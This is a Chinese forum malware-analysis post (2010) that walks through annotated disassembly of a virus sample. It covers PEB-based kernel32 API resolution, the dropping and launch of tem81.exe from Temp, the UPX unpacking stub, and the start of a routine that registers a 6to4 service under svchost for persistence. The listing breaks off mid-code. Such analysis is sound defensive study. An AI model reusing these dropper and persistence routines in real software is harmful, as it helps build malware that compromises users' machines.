标 题: 【原创】标准pe格式带病毒样本分析。 作 者: flyicegood 时 间: 2010-06-03,16:26:42 链 接: http://bbs.pediy.com/showthread.php?t=114428 标准pe格式带病毒样本分析。 样本执行的过程中会释放出tem81.exe,tem81.exe文件则会创建一个系统服务,为系统服务释放一个支持该服务的6to4.dll文件。 样本的汇编代码分析: ..:0040E000 call $+5 ; ..:0040E000 ; ..:0040E005 pop ebx ; ebx获得一个偏移 ..:0040E005 ; ..:0040E006 sub ebx, 400205h ; ebx=偏移-400205h ..:0040E006 ; ..:0040E00C mov edi, large fs:30h ; 把段fs加30的地址是指向peb 结构的地址 ..:0040E013 mov edi, [edi+0Ch] ; peb偏移c就是peb—— ldrdata结构 ..:0040E016 mov edi, [edi+1Ch] ; PEB_LDR_DATA的1c处是模 块加载顺序列表地址 ..:0040E019 mov edi, [edi] ; 获取这个LIST_ENTRY列表 ..:0040E01B mov edi, [edi+8] ; 列表加载的第一个是ntdll,第二个 是kernel32.dll,一个LIST_ENTRY得大小是8 ..:0040E01E mov [ebx+4003C2h], edi ; 把kernel32.dll的地 址存储在ebx+4003c2h处 ..:0040E024 mov esi, edi ; 把刚出的kernel32地址给esi ..:0040E026 add esi, [esi+3Ch] ; 在kernel32上加3c做地址取数 据给esi ..:0040E029 mov esi, [esi+78h] ; 把输出表的相对地址地址赋给esi ..:0040E02C add esi, edi ; 输出表相对地址加上基址得输出表的地址 ..:0040E02E push esi ; 压入输出表的地址 ..:0040E02F mov ebp, [esi+18h] ; 把有名函数的总数赋给ebp ..:0040E032 mov esi, [esi+20h] ; 把导出函数名数组的相对地址给esi ..:0040E035 add esi, edi ; 导出函数名地址加上基址 ..:0040E037 xor edx, edx ; 计数器清零 ..:0040E039 ..:0040E039 loc_40E039: ; CODE XREF: start+5E j ..:0040E039 push esi ; 将导出函数名数组压入栈 ..:0040E03A mov edi, [esi] ; 取出第一个函数名地址 ..:0040E03C add edi, [ebx+4003C2h] ; 加上kennel32的地址就是 函数名的真正地址 ..:0040E042 lea esi, [ebx+400387h] ; getprocaddress字 符的地址 ..:0040E048 mov ecx, 0Fh ; 计数器设为15 ..:0040E04D repe cmpsb ..:0040E04F jnz short loc_40E057 ; 如果不相等就跳转 ..:0040E051 pop esi ; 函数名数组出栈给esi ..:0040E052 mov edx, esi ; 函数名数组又给edx ..:0040E054 pop esi ; 输出表地址出栈给esi ..:0040E055 jmp short loc_40E068 ; 跳转 ..:0040E057 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪? ..:0040E057 ..:0040E057 loc_40E057: ; CODE XREF: start+4F j ..:0040E057 pop esi ; 不想等函数名数组出栈给esi ..:0040E058 add esi, 4 ; 函数名数组指针指向下一个函数名 ..:0040E05B inc edx ; 计数器加一 ..:0040E05C cmp edx, ebp ; 判断计数器有没有达到有名函数的总数 ..:0040E05E jb short loc_40E039 ; 没有就再循环查找 ..:0040E060 sub esp, 4 ; 达到了总数还没有找到,平衡堆栈 ..:0040E063 jmp loc_40E182 ; 跳转 ..:0040E068 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪? ..:0040E068 ..:0040E068 loc_40E068: ; CODE XREF: start+55 j ..:0040E068 sub edx, [esi+20h] ; 找到了,输出表的20处是函数名数组相 对地址, ..:0040E06B mov eax, [ebx+4003C2h] ; kennel32的地址的地址给 eax ..:0040E071 sub edx, eax ; 减去kennel32的地址就是 kernel32的基址 ..:0040E073 shr edx, 1 ; 乘以2 ..:0040E075 add edx, [esi+24h] ; 基址加上名字数组序列号相对地址就是数 组序列号的绝对地址 ..:0040E078 add edx, eax ; 再加上重定位地址,就是序列号数组的真 地址 ..:0040E07A movzx eax, word ptr [edx] ; 取得序列号数组 ..:0040E07D shl eax, 2 ; 乘以4 ..:0040E080 add eax, [esi+1Ch] ; 加上存函数地址数组的相对地址 ..:0040E083 add eax, [ebx+4003C2h] ; 加上重定位地址就是真正的存函数 地址的地址 ..:0040E089 mov eax, [eax] ; 取得函数地址 ..:0040E08B add eax, [ebx+4003C2h] ; 加上这个重定位地址就是真正的地 址 ..:0040E091 mov edi, eax ; 获得了getprocadress的调 用地址 ..:0040E091 ; ..:0040E093 mov ebp, esp ; 当前的栈顶当栈底 ..:0040E095 mov edx, [ebx+4003C2h] ..:0040E09B lea eax, [ebx+400396h] ..:0040E0A1 push eax ..:0040E0A2 push edx ..:0040E0A3 call edi ; 取 "GetTempPathA"的 地址 ..:0040E0A3 ; ..:0040E0A5 sub esp, 104h ..:0040E0AB push esp ..:0040E0AC push 104h ..:0040E0B1 call eax ; 调用 kernel32.GetTempPathA,取临时文件的路径 ..:0040E0B1 ; ..:0040E0B1 ; ..:0040E0B3 lea eax, [ebx+4003A3h] ..:0040E0B9 push eax ..:0040E0BA mov edx, [ebx+4003C2h] ..:0040E0C0 push edx ..:0040E0C1 call edi ; 获得lstrcatA函数 ..:0040E0C1 ; ..:0040E0C3 lea ecx, [ebx+4003ACh] ; tem81.exe的字符串地址 ..:0040E0C9 push ecx ..:0040E0CA mov ecx, esp ..:0040E0CC add ecx, 4 ..:0040E0CF push ecx ; 将GetTempPathA返回的路径 字符串压入堆栈 ..:0040E0CF ; ..:0040E0D0 call eax ; 路径与 tem81.exe 组合 ..:0040E0D0 ; ..:0040E0D2 lea eax, [ebx+4003B6h] ; CreateFileA字符串地 址 ..:0040E0D8 push eax ..:0040E0D9 mov edx, [ebx+4003C2h] ..:0040E0DF push edx ..:0040E0E0 call edi ; 取 "CreateFileA"的地址 ..:0040E0E0 ; ..:0040E0E2 mov ecx, esp ; 创建的文件名 ..:0040E0E4 push 0 ..:0040E0E6 push 80h ..:0040E0EB push 2 ..:0040E0ED push 0 ..:0040E0EF push 0 ..:0040E0F1 push 0C0000000h ..:0040E0F6 push ecx ..:0040E0F7 call eax ; 创建文件 "C:\DOCUME~1 \ADMINI~1\LOCALS~1\Temp\tem81.exe ..:0040E0F7 ; ..:0040E0F9 mov esi, eax ; 将文件的句柄存在esi中 ..:0040E0FB lea ecx, [ebx+4003EDh] ; WriteFile字符串的地址 ..:0040E101 push ecx ..:0040E102 push ecx ..:0040E103 mov edx, [ebx+4003C2h] ..:0040E109 push edx ..:0040E10A call edi ; 获得WriteFile函数 ..:0040E10C pop ecx ..:0040E10D push 0 ..:0040E10F push ecx ; 用于实际写入区域的字节数 ..:0040E110 add ecx, 0Ah ..:0040E113 mov edx, [ecx] ..:0040E115 push edx ; 要写的字节数 ..:0040E116 push ecx ; 数据缓冲区的指针 ..:0040E117 mov edx, 905A4Dh ..:0040E11C mov [ecx], edx ..:0040E11E push esi ; 文件句柄 ..:0040E11F call eax ; 将内容写入文件,此时堆栈 0012FEAC 00000044 文件句柄 ..:0040E11F ; 0012FEB0 0040E1F7 缓 冲区,存放要写入的内容 ..:0040E11F ; 0012FEB4 00005C00 写 入的大小 ..:0040E11F ; ..:0040E121 lea eax, [ebx+4003D5h] ; CloseHandle ..:0040E127 push eax ..:0040E128 mov edx, [ebx+4003C2h] ..:0040E12E push edx ..:0040E12F call edi ; 取得CloseHandle函数 ..:0040E131 push esi ; 关闭打开的文件 ..:0040E132 call eax ..:0040E134 lea eax, [ebx+4003C6h] ..:0040E13A push eax ..:0040E13B mov edx, [ebx+4003C2h] ..:0040E141 push edx ..:0040E142 call edi ; 取"CreateProcessA"的 地址 ..:0040E142 ; ..:0040E144 sub esp, 44h ..:0040E147 mov edx, esp ..:0040E149 mov esi, 0 ..:0040E14E mov ecx, 11h ..:0040E153 ..:0040E153 loc_40E153: ; CODE XREF: start+158 j ..:0040E153 mov [edx], esi ..:0040E155 add edx, 4 ..:0040E158 loop loc_40E153 ; 0040E153栈顶清0,构造 CreateProcessA所需的运行环境 ..:0040E158 ; ..:0040E15A mov edx, 44h ..:0040E15F mov [esp+0], edx ..:0040E162 sub esp, 10h ..:0040E165 mov edx, esp ..:0040E167 push esp ; 返回的句柄等信息 ..:0040E168 add edx, 10h ..:0040E16B push edx ; 新进程的窗口 ..:0040E16C push 0 ; 使用当前目录 ..:0040E16E push 0 ; 环境变量 ..:0040E170 push 0 ; 优先级 ..:0040E172 push 0 ; 可否继承 ..:0040E174 push 0 ; 线程安全性 ..:0040E176 push 0 ; 进程安全性 ..:0040E178 push 0 ; 要传递的执行模块参数 ..:0040E17A add edx, 44h ..:0040E17D push edx ; 可执行文件的名称 ..:0040E17E call eax ; 运行刚生成的那个文件 ..:0040E180 mov esp, ebp ; 跳向原始的oep ..:0040E182 ..:0040E182 loc_40E182: ; CODE XREF: start+63 j ..:0040E182 jmp loc_4010CC ..:0040E182 start endp 样本在C:\Documents and Settings\Administrator\Local Settings\Temp目录下释放了一个 tem81.exe文件,再样本中就存好了temp81.exepe文件 格式的数据,样本通过api,创建文件,再将这些pe格式的数据写入到tem81.exe文件中。样再创建新进程启动这个tem81.exe。 释放出来了的tem81.exe文件时通过upx加密的,upx壳有三个区段,upx0,upx1和rvrs。upx壳负责将upx1中的真正的程序解压 到upx0中,再重新 地位输入表中输入函数的地址,再跳到upx0中的真正程序中去执行。具体分析: tem81中upx壳的分析: 緮褀t烈w? UPX1:0040B080 public start UPX1:0040B080 start proc near UPX1:0040B080 UPX1:0040B080 var_AC = dword ptr -0ACh UPX1:0040B080 UPX1:0040B080 pusha ; upx壳: UPX1:0040B080 ; 寄存器入栈 UPX1:0040B081 mov esi, offset dword_406000 ; upx1的起始 地址406000的偏移地址给esi UPX1:0040B086 lea edi, [esi-5000h] ; 这个地址减去upx0的大小就是 401000 UPX1:0040B08C push edi ; upx0的地址压入 UPX1:0040B08D jmp short getfirstdword UPX1:0040B08D ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪? UPX1:0040B08F align 10h UPX1:0040B090 UPX1:0040B090 kaowhile: ; CODE XREF: start:loc_40B0A1 j UPX1:0040B090 mov al, [esi] ; 把upx1的第二双字最低字节取出 UPX1:0040B092 inc esi ; upx1的指针加一 UPX1:0040B093 mov [edi], al ; 把upx1第二双字最低字节拷贝到 upx0第一字节中去 UPX1:0040B095 inc edi ; upx0指针加一 UPX1:0040B096 UPX1:0040B096 inkaowhile: ; CODE XREF: start+AE j UPX1:0040B096 ; start+C5 j UPX1:0040B096 add ebx, ebx ; upx的第一双字ebx再左移一位 UPX1:0040B098 jnz short loc_40B0A1 ; 如果结果不是零就跳转 UPX1:0040B09A UPX1:0040B09A getfirstdword: ; CODE XREF: start+D j UPX1:0040B09A mov ebx, [esi] ; 把upx1的第一双字取出ebx UPX1:0040B09C sub esi, 0FFFFFFFCh ; upx1偏移地址减去-4就是加4 指向第二个双字 UPX1:0040B09F adc ebx, ebx ; 第一双字ebx*2+1,左移一 位,用进位填充 UPX1:0040B0A1 UPX1:0040B0A1 loc_40B0A1: ; CODE XREF: start+18 j UPX1:0040B0A1 jb short kaowhile ; 结果益处,大于32位则跳转如果 2*ebx+1大于2的32次方继续下个循环 UPX1:0040B0A1 ; 直到ebx的一位为零时停止拷贝 UPX1:0040B0A3 mov eax, 1 ; 将upx1的第3字节后面的一段数 据给upx0,upx1的第一个双字确定拷贝长度 UPX1:0040B0A3 ; upx0的数据是: UPX1:0040B0A3 ; 00401000 55 8B EC 81 EC 90 0D 00 00 FF 15 DC 20 40 00 6A U 嬱侅?.. ?@.j UPX1:0040B0A3 ; UPX1:0040B0A3 ; kaowhile循环结束 UPX1:0040B0A3 ; 初始化eax为1 UPX1:0040B0A8 UPX1:0040B0A8 secowhile: ; CODE XREF: start+37 j UPX1:0040B0A8 ; start+42 j UPX1:0040B0A8 add ebx, ebx ; ebx再移位,把零位后面的那位取 出 UPX1:0040B0AA jnz short loc_40B0B3 ; 如果ebx移位后不是零跳转 UPX1:0040B0AC mov ebx, [esi] ; 如果ebx移位后是零,则再从 upx1的当前指针取一个双字数据当ebx UPX1:0040B0AE sub esi, 0FFFFFFFCh ; 再移动upx1的指针 UPX1:0040B0B1 adc ebx, ebx ; 取的该双字后左移一位,用进位填充 UPX1:0040B0B3 UPX1:0040B0B3 loc_40B0B3: ; CODE XREF: start+2A j UPX1:0040B0B3 adc eax, eax ; 将计数器eax左移一位,最后一位 用ebx移出来的最高位填充 UPX1:0040B0B5 add ebx, ebx ; ebx再左移一位 UPX1:0040B0B7 jnb short secowhile ; 移出那位是零就跳转,进入下次循环 UPX1:0040B0B9 jnz short loc_40B0C4 ; ebx移位后不是零就跳转 UPX1:0040B0BB mov ebx, [esi] ; 如果ebx移位后是零就再向 upx1取一个双字 UPX1:0040B0BD sub esi, 0FFFFFFFCh UPX1:0040B0C0 adc ebx, ebx UPX1:0040B0C2 jnb short secowhile ; 取得双字后,左移一位,移出位是0 就跳转,进入下一次循环 UPX1:0040B0C4 UPX1:0040B0C4 loc_40B0C4: ; CODE XREF: start+39 j UPX1:0040B0C4 xor ecx, ecx ; ecx清零 UPX1:0040B0C6 sub eax, 3 ; eax=eax-3 UPX1:0040B0C9 jb short loc_40B0D8 ; 如果eax小于3就跳转 UPX1:0040B0CB shl eax, 8 ; 如果eax>=3,eax= (eax-3)再左移八位 UPX1:0040B0CE mov al, [esi] ; 继续从upx1刚才拷到得地方再拷 一字节给eax的第一字节 UPX1:0040B0D0 inc esi ; upx1的指针再加一 UPX1:0040B0D1 xor eax, 0FFFFFFFFh ; 最低字节是upx里拷贝的数据的 eax按位求非 UPX1:0040B0D4 jz short endkaowhile ; 如果结果等于零跳转,不再进入 kaowhile UPX1:0040B0D6 mov ebp, eax ; 把eax运算的结果给ebp栈 底,ebp=eax UPX1:0040B0D8 UPX1:0040B0D8 loc_40B0D8: ; CODE XREF: start+49 j UPX1:0040B0D8 add ebx, ebx ; ebx再左移一位 UPX1:0040B0D8 ; UPX1:0040B0D8 ; UPX1:0040B0D8 ; UPX1:0040B0D8 ; 连续将ebx移出二位,移到ecx 的中去 UPX1:0040B0DA jnz short loc_40B0E3 ; 不等于零就跳转 UPX1:0040B0DC mov ebx, [esi] ; 等于零就再向upx1取 UPX1:0040B0DE sub esi, 0FFFFFFFCh UPX1:0040B0E1 adc ebx, ebx UPX1:0040B0E3 UPX1:0040B0E3 loc_40B0E3: ; CODE XREF: start+5A j UPX1:0040B0E3 adc ecx, ecx ; ecx左移一位,最后一位,用 ebx的移出的最高位填充 UPX1:0040B0E5 add ebx, ebx ; ebx再左移一位 UPX1:0040B0E7 jnz short loc_40B0F0 ; 不等于零又跳转 UPX1:0040B0E9 mov ebx, [esi] UPX1:0040B0EB sub esi, 0FFFFFFFCh UPX1:0040B0EE adc ebx, ebx UPX1:0040B0F0 UPX1:0040B0F0 loc_40B0F0: ; CODE XREF: start+67 j UPX1:0040B0F0 adc ecx, ecx ; 计数器ecx移一位,用ebx移出 的位填充 UPX1:0040B0F2 jnz short endsecwhile ; 计数器不等于零就跳转 UPX1:0040B0F2 ; UPX1:0040B0F2 ; 连续移出二位,都不是零就跳转 UPX1:0040B0F4 inc ecx ; 如果ecx是零,那就加一 UPX1:0040B0F5 UPX1:0040B0F5 loc_40B0F5: ; CODE XREF: start+84 j UPX1:0040B0F5 ; start+8F j UPX1:0040B0F5 add ebx, ebx ; ebx再左移一位 UPX1:0040B0F7 jnz short loc_40B100 ; 左移一位结果不是零,就跳转 UPX1:0040B0F9 mov ebx, [esi] ; 是零就接着去数据 UPX1:0040B0FB sub esi, 0FFFFFFFCh UPX1:0040B0FE adc ebx, ebx UPX1:0040B100 UPX1:0040B100 loc_40B100: ; CODE XREF: start+77 j UPX1:0040B100 adc ecx, ecx ; ecx左移一位,用ebx移出位填 充 UPX1:0040B102 add ebx, ebx ; ebx再移一位 UPX1:0040B104 jnb short loc_40B0F5 ; 移出位是零就跳转 UPX1:0040B106 jnz short loc_40B111 ; ebx移一位后不是零就跳转 UPX1:0040B108 mov ebx, [esi] ; 是零就接着取数据 UPX1:0040B10A sub esi, 0FFFFFFFCh UPX1:0040B10D adc ebx, ebx UPX1:0040B10F jnb short loc_40B0F5 UPX1:0040B111 UPX1:0040B111 loc_40B111: ; CODE XREF: start+86 j UPX1:0040B111 add ecx, 2 ; ecx=ecx+2 UPX1:0040B114 UPX1:0040B114 endsecwhile: ; CODE XREF: start+72 j UPX1:0040B114 cmp ebp, 0FFFFF300h ; ebp-fffff300 UPX1:0040B11A adc ecx, 1 ; ecx是ebx连续移出的两 位,ecx=ecx+1+c UPX1:0040B11D lea edx, [edi+ebp] UPX1:0040B120 cmp ebp, 0FFFFFFFCh ; ebp-fffffffc UPX1:0040B123 jbe short smallebp ; 如果ebp小于等于 fffffffc就跳转,跳出secowhile UPX1:0040B125 UPX1:0040B125 kaoedxtoedi: ; CODE XREF: start+AC j UPX1:0040B125 mov al, [edx] ; 大于就把upx0的edx地址处的 数据给al UPX1:0040B127 inc edx ; 移动指针 UPX1:0040B128 mov [edi], al ; 把edx的数据给upx0的edi 处 UPX1:0040B12A inc edi UPX1:0040B12B dec ecx ; ecx减一 UPX1:0040B12C jnz short kaoedxtoedi ; ecx减一不等于零跳转 UPX1:0040B12E jmp inkaowhile ; 拷完ecx个字节,继续进入 kaowhile循环 UPX1:0040B12E ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪? UPX1:0040B133 align 4 UPX1:0040B134 UPX1:0040B134 smallebp: ; CODE XREF: start+A3 j UPX1:0040B134 ; start+C1 j UPX1:0040B134 mov eax, [edx] ; 如果ebp小于fffffffc跳 到这里 UPX1:0040B136 add edx, 4 UPX1:0040B139 mov [edi], eax UPX1:0040B13B add edi, 4 UPX1:0040B13E sub ecx, 4 ; 将edx的四个字节给edi的四个 字节 UPX1:0040B141 ja short smallebp ; ecx大于零接着拷贝 UPX1:0040B143 add edi, ecx UPX1:0040B145 jmp inkaowhile ; 再进入kaowhile循环 UPX1:0040B14A ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪? UPX1:0040B14A UPX1:0040B14A endkaowhile: ; CODE XREF: start+54 j UPX1:0040B14A pop esi ; 拷贝完成时esi是40b07a UPX1:0040B14A ; edi是40a51a UPX1:0040B14A ; upx0的起始地址401000出 栈给esi UPX1:0040B14B mov edi, esi ; edi= esi upx0的起始 地址 UPX1:0040B14D mov ecx, 2Fh ; ecx = 2fh UPX1:0040B152 UPX1:0040B152 seache8: ; CODE XREF: start+D9 j UPX1:0040B152 ; start+DE j UPX1:0040B152 mov al, [edi] ; 取upx0第一个字节 UPX1:0040B154 inc edi ; 移动upx0的指针 UPX1:0040B155 sub al, 0E8h ; al=al-e8第一字节减去e8 UPX1:0040B157 UPX1:0040B157 loc_40B157: ; CODE XREF: start+FC j UPX1:0040B157 cmp al, 1 ; el-1是否大于零 UPX1:0040B159 ja short seache8 ; al减一大于零就继续循环取 upx0的数据 UPX1:0040B15B cmp byte ptr [edi], 2 UPX1:0040B15E jnz short seache8 ; 搜索e8且后面是2的地方 UPX1:0040B160 mov eax, [edi] ; 把这个地址的数据900C0002 给eax UPX1:0040B162 mov bl, [edi+4] ; 再把搜索的eax地址退后4字节的 数据给bl UPX1:0040B165 shr ax, 8 ; ax右移8位 UPX1:0040B169 rol eax, 10h ; eax的高位和地位换 UPX1:0040B16C xchg al, ah ; ax高底位互换变成了 00000C90 UPX1:0040B16E sub eax, edi ; eax=eax-edi=FFBFFC4C UPX1:0040B16E ; eax减去搜索到的地址edi UPX1:0040B170 sub bl, 0E8h ; bl=bl - e8 UPX1:0040B173 add eax, esi ; eax=eax+esi,ffbffc4c+401000 UPX1:0040B175 mov [edi], eax ; 再吧结果eax给搜索到的edi地 址处 UPX1:0040B177 add edi, 5 ; 搜索地址edi=5 UPX1:0040B17A mov al, bl ; 将搜索到的地址退后4字节的数据运 减e8后的结果算给al UPX1:0040B17C loop loc_40B157 ; 找到第2fh个e8 02的书据 UPX1:0040B17E lea edi, [esi+9000h] ; 将upx0的推后9000即 40a000地址给edi就是输入表的函数名数组 UPX1:0040B184 UPX1:0040B184 getfunction: ; CODE XREF: start+126 j UPX1:0040B184 mov eax, [edi] ; 取得40a000处的数据d0 UPX1:0040B186 or eax, eax UPX1:0040B188 jz short loc_40B1C6 ; 如果取得数据eax是零就跳转 UPX1:0040B18A mov ebx, [edi+4] ; 就是输入表的函数地址数组 UPX1:0040B18D lea eax, [eax+esi+0B064h] ; eax=upx0+eax+b064h 构造地址upx0地址加上eax加b064h UPX1:0040B18D ; 就是kernel.dll字符串的 地址 UPX1:0040B194 add ebx, esi ; ebx = upx0+ebx UPX1:0040B196 push eax ; kernel.dll字符串地址进 栈 UPX1:0040B197 add edi, 8 ; edi=edi+8 指向 40a008地址 UPX1:0040B19A call dword ptr [esi+0B0F0h] ; 调用 loadlibrarya函数upx0+b0f0h处函数 UPX1:0040B1A0 xchg eax, ebp ; 用kernel.dll的模块地址 eax和ebp互换 UPX1:0040B1A1 UPX1:0040B1A1 loc_40B1A1: ; CODE XREF: start+13E j UPX1:0040B1A1 mov al, [edi] ; 把40a008(函数名)的一个字 节给al UPX1:0040B1A3 inc edi ; edi指向下个字节 UPX1:0040B1A4 or al, al UPX1:0040B1A6 jz short getfunction ; 判断字节al是否为零,为零就 接着进入下次搜索 UPX1:0040B1A8 mov ecx, edi ; 函数名的首地址给ecx UPX1:0040B1AA push edi ; 压入函数名 UPX1:0040B1AB dec eax ; eax减一 UPX1:0040B1AC repne scasb UPX1:0040B1AE push ebp ; 压入kernel.dll的模块地 址 UPX1:0040B1AF call dword ptr [esi+0B0F4h] ; 调用 getprocaddress函数 UPX1:0040B1B5 or eax, eax ; 返回值是零就跳转 UPX1:0040B1B7 jz short loc_40B1C0 ; 填完函数输入表,跳出 UPX1:0040B1B9 mov [ebx], eax ; 取得了函数的地址存ebx指定的地 址处 UPX1:0040B1BB add ebx, 4 UPX1:0040B1BE jmp short loc_40B1A1 UPX1:0040B1C0 ; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪? UPX1:0040B1C0 UPX1:0040B1C0 loc_40B1C0: ; CODE XREF: start+137 j UPX1:0040B1C0 call dword ptr [esi+0B104h] UPX1:0040B1C6 UPX1:0040B1C6 loc_40B1C6: ; CODE XREF: start+108 j UPX1:0040B1C6 mov ebp, [esi+0B0F8h] ; 把 virtualproctect函数地址给ebp UPX1:0040B1CC lea edi, [esi-1000h] ; edi=400000 UPX1:0040B1D2 mov ebx, 1000h UPX1:0040B1D7 push eax UPX1:0040B1D8 push esp UPX1:0040B1D9 push 4 UPX1:0040B1DB push ebx UPX1:0040B1DC push edi UPX1:0040B1DD call ebp ; 调用 virtualproctect函数 UPX1:0040B1DF lea eax, [edi+1EFh] UPX1:0040B1E5 and byte ptr [eax], 7Fh UPX1:0040B1E8 and byte ptr [eax+28h], 7Fh UPX1:0040B1EC pop eax UPX1:0040B1ED push eax UPX1:0040B1EE push esp UPX1:0040B1EF push eax UPX1:0040B1F0 push ebx UPX1:0040B1F1 push edi UPX1:0040B1F2 call ebp ; 调用 virtualproctect函数 UPX1:0040B1F4 pop eax UPX1:0040B1F5 popa UPX1:0040B1F6 lea eax, [esp+2Ch+var_AC] UPX1:0040B1FA UPX1:0040B1FA loc_40B1FA: ; CODE XREF: start+17E j UPX1:0040B1FA push 0 UPX1:0040B1FC cmp esp, eax UPX1:0040B1FE jnz short loc_40B1FA UPX1:0040B200 sub esp, 0FFFFFF80h UPX1:0040B203 jmp near ptr dword_401000 ; upx壳结束,跳到主 程序 UPX1:0040B203 start endp UPX1:0040B203 tem81的主程序里面创建一个6to4服务,该服务在svchost下,6to4支持的动态链接库是6to4.dll。再开启这个服务。 主程序的分析: 00401000 55 push ebp ; 壳中的程 序 00401001 8BEC mov ebp, esp 00401003 81EC 900D0000 sub esp, 0D90 00401009 FF15 DC204000 call dword ptr [4020DC] ; USER32.GetInputState 0040100F 6A 00 push 0 00401011 6A 00 push 0 00401013 6A 00 push 0 ; 获得当前 线程的id 00401015 FF15 80204000 call dword ptr [402080] ; kernel32.GetCurrentThreadId 0040101B 50 push eax ; 向当前线 程发送一个wm_null消息 0040101C FF15 E4204000 call dword ptr [4020E4] ; USER32.PostThreadMessageA 00401022 6A 00 push 0 00401024 6A 00 push 0 00401026 6A 00 push 0 00401028 8D85 3CFEFFFF lea eax, dword ptr [ebp- 1C4] ; pmessage(ebp-1c4)结构地址指针给eax 0040102E 50 push eax ; 取得消息 0040102F FF15 E8204000 call dword ptr [4020E8] ; USER32.GetMessageA 00401035 68 04010000 push 104 ; 大小 0040103A 6A 00 push 0 0040103C 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8] 00401042 50 push eax ; 把 psubstr地址压入,设置该内存的数据 00401043 E8 4C0C0000 call 00401C94 ; jmp 到 MSVCRT.memset 00401048 83C4 0C add esp, 0C ; 外部平衡 堆栈 0040104B 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8] ; 取得刚清 空的内存的地址psubstr 00401051 50 push eax 00401052 E8 A8060000 call 004016FF ; 调用 fcheckfile函数,一个参数是存文件路径空格以后的字符 00401057 8945 E8 mov dword ptr [ebp- 18], eax ; isdelfilecevent是否删除文件和创建了事件 0040105A 68 80000000 push 80 0040105F 6A 00 push 0 00401061 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] ; 清空 ebp-a0 00401067 50 push eax 00401068 E8 270C0000 call 00401C94 ; jmp 到 MSVCRT.memset 0040106D 83C4 0C add esp, 0C ; 外部平衡 堆栈 00401070 68 80000000 push 80 00401075 6A 00 push 0 00401077 8D85 B8FDFFFF lea eax, dword ptr [ebp-248] ; ebp- 248内存也清零 0040107D 50 push eax 0040107E E8 110C0000 call 00401C94 ; jmp 到 MSVCRT.memset 00401083 83C4 0C add esp, 0C ; 外部平衡 堆栈 00401086 68 3F000F00 push 0F003F ; 访问类型 0040108B 6A 00 push 0 ; 数据库名 称 0040108D 6A 00 push 0 ; 机器名 称,建立连接到服务控制管理器并打开数据库 0040108F FF15 24204000 call dword ptr [402024] ; ADVAPI32.OpenSCManagerA 00401095 8945 F8 mov dword ptr [ebp- 8], eax ; hdataserver数据库德句柄 00401098 8365 E4 00 and dword ptr [ebp-1C], 0 ; ebp- 1c清零 0040109C 8D45 F0 lea eax, dword ptr [ebp-10] ; ebp- 10放hreg注册表取得ebp-10变量的地址 0040109F 50 push eax ; 返回结果 004010A0 6A 01 push 1 ; 操作 004010A2 6A 00 push 0 ; 选项 004010A4 68 88214000 push 00402188 ; ASCII "SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" 004010A9 68 02000080 push 80000002 ; 主键,打 开svchost注册表存在hreg变量处(ebp-10) 004010AE FF15 1C204000 call dword ptr [40201C] ; ADVAPI32.RegOpenKeyExA 004010B4 68 00040000 push 400 004010B9 6A 00 push 0 004010BB 8D85 B0F9FFFF lea eax, dword ptr [ebp-650] ; 清零 ebp-650处的数据 004010C1 50 push eax 004010C2 E8 CD0B0000 call 00401C94 ; jmp 到 MSVCRT.memset 004010C7 83C4 0C add esp, 0C ; 平衡堆栈 004010CA C745 F4 0004000>mov dword ptr [ebp-C], 400 ; 给 ebp-c赋值400 004010D1 8D45 F4 lea eax, dword ptr [ebp-C] 004010D4 50 push eax ; pbufsize(ebp- c)地址进栈 004010D5 8D85 B0F9FFFF lea eax, dword ptr [ebp-650] 004010DB 50 push eax ; buffer(ebp- 650)地址进栈 004010DC 8D45 EC lea eax, dword ptr [ebp-14] ; ebp- 14地址进栈 004010DF 50 push eax ; pvaluetype 004010E0 6A 00 push 0 ; reserved 004010E2 68 C0214000 push 004021C0 ; ValueName = "netsvcs" 004010E7 FF75 F0 push dword ptr [ebp-10] ; 压入打开 的注册表句柄,查询注册表netsvcs的值 004010EA FF15 08204000 call dword ptr [402008] ; ADVAPI32.RegQueryValueExA 004010F0 FF75 F0 push dword ptr [ebp-10] ; 关闭注册 表句柄hreg 004010F3 FF15 10204000 call dword ptr [402010] ; ADVAPI32.RegCloseKey 004010F9 837D E8 01 cmp dword ptr [ebp- 18], 1 ; isdelfilecevent(ebp-18)是否删除文件及创建事件,没有就跳转 004010FD 75 7D jnz short 0040117C 004010FF 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] 00401105 50 push eax 00401106 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8] ; 空格后的 字符串ebp-1a8 0040110C 50 push eax 0040110D 8D85 B0F9FFFF lea eax, dword ptr [ebp- 650] ; netsvcs注册表的值 00401113 50 push eax 00401114 E8 F0090000 call 00401B09 ; 调用函数 openservice(pnetsvcs,psubspace,pz)py是ebp-1a8空格后的字符 00401119 68 10000100 push 10010 ; UNICODE "ALLUSERSPROFILE=C:\Documents and Settings\All Users" 0040111E 8D85 60FFFFFF lea eax, dword ptr [ebp-A0] ; pz 00401124 50 push eax ; 打开 C:\Documents and Settings\All Users" 00401125 FF75 F8 push dword ptr [ebp- 8] ; hdataserver数据库德句柄 00401128 FF15 14204000 call dword ptr [402014] ; ADVAPI32.OpenServiceA 0040112E 8945 E4 mov dword ptr [ebp- 1C], eax ; hservice(ebp-1c) 00401131 8D85 58FEFFFF lea eax, dword ptr [ebp-1A8] 00401137 50 push eax 00401138 E8 EC070000 call 00401929 ; create(psubstr) 0040113D 83F8 01 cmp eax, 1 00401140 75 28 jnz short 0040116A ; 创建文件 成功 00401142 6A 00 push 0 00401144 6A 00 push 0 00401146 FF75 E4 push dword ptr 